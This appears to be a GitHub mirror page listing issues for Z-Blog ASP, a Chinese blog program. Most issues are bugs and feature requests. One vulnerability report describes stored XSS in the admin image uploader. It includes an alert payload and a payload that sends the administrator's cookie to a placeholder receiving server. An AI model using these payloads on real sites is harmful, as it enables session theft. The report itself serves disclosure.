zblogcn / zblogasp Goto Github PK
View Code? Open in Web Editor NEWZ-Blog是一款小巧而强大的ASP博客程序,同时支持Microsoft Access和Microsoft SQL Server两种数据库。
Home Page: http://www.zblogcn.com/
License: MIT License
zblogasp's People
Contributors
Stargazers
Watchers
Forkers
gbuntoo stan-lin- plxiayutian joel423 faint32 julinn ropean lnbqian cnsuhao kananami wdssmq looknd echoflash xiaodin1 guoyu07 rahulyhg qq59351788 onelazyboy itxcx linhub lovesports88 karrol yongboteam szfredh xxdoc vts2018 shangganjidi c2cn binjiangdao znynn qqzzftzblogasp's Issues
文章中插入图片不能设置Alt
评论功能自定义字段及管理
http://bbs.zblogcn.com/thread-87243-1-1.html
有点意思
具体作为插件(自己弄个新表)或类似CustomMeta的方式待商讨。
伪静态后日期链接仍然是动态的。
日历模块中的链接什么的。。
theme_edit.asp 和plugin_edit.asp 的上传按钮
SQL Server Unicode问题
应用打包时过滤指定文件(夹)
可以考虑内置config、cache、build 三个文件夹的过滤。。
建议应用信息编辑界面增加上传链接
theme_edit.asp和plugin_edit.asp内增加上传链接(重要:新窗口打开)
后台富文本编辑器图片上传功能存在XSS漏洞
在后台进行文章编辑时,点击多图上传
选择插入图片,在地址输入以下Payload:"><img src=1 onerror=alert(document.cookie)>,就可以触发
保存后,每当管理员进行编辑,就会触发其中的代码
可以使用以下payload将管理员的Cookie信息窃取发送到指定的服务器
<img src=1 onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://接收数据的地址/' + document.cookie, true);xhttp.send();">
获取到的Cookie信息
系统出错了,网站进不去了
代码如下:
(4)E_PARSE : syntax error, unexpected T_CONSTANT_ENCAPSED_STRING (register_shutdown_function) (150101) (WINNT; IIS6.0; PHP 5.2.17; mysql; curl)
建议增加b_article-multi模板处理接口
可以按分类设置不同的摘要模板,实现微语功能。。。
Sitemap插件wap地址错误
删除分类相关逻辑错误
应用中心导出链接错误
submit.asp?type=theme 里的导出仍然是导出插件。。
用插件来做这些事真心蛋疼好么。。
https://app.zblogcn.com/?id=1054
看更新日志。。
TArticle类不能设置Url
包括tags.asp里的链接也是id=0的文章。。。。。。
安装成功后不显示主页
-version sql server2014 IIS 10.0
1.下载完整安装包解压
2.在iis中添加网站并更改 “发送错误到浏览器”、“启用父路径”
3.按照安装指示页面进行安装,显示安装成功
4.点击完成后未正确跳转到主页 url访问zb_system/login.asp显示数据库连接错误,安装过程显示数据库连接成功
UE无法播放视频
应用信息编辑页缺少上传按钮
编辑插件信息(主要是为了更新日期)后想要上传到应中心的话必须切换回应用列表页。。
伪静态分页设置不够灵活
不能设置 /tag/纠结/2/ 样式的分页规则。
c_html_js.asp?include= 输出错误
winserver 2016 x64 无法正常使用 zblog
出现cpu很高,页面打开很慢,建议兼容下新环境
Cookie会出现在奇怪的路径下
评论网址末考虑https://
If Len(HomePage)>0 Then If InStr(HomePage,"http://")=0 Then HomePage="http://" & HomePage End If
TArticle类多余代码
记得清理
Public Property Get WAPUrl
WAPUrl = BlogHost & "?mod=wap&act=View&id=" & ID
End Property
Public Property Get HtmlWAPUrl
HtmlWAPUrl=TransferHTML(WAPUrl,"[html-format]")
End Property
Public Property Get PadUrl
PadUrl = BlogHost & "?mod=pad&act=View&id=" & ID
End Property
Public Property Get HtmlPadUrl
HtmlPadUrl=TransferHTML(PadUrl,"[html-format]")
End Property
TArticleList类Url属性存在意义不明
然后永远是第一页的地址。。。
UEditor BUG
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.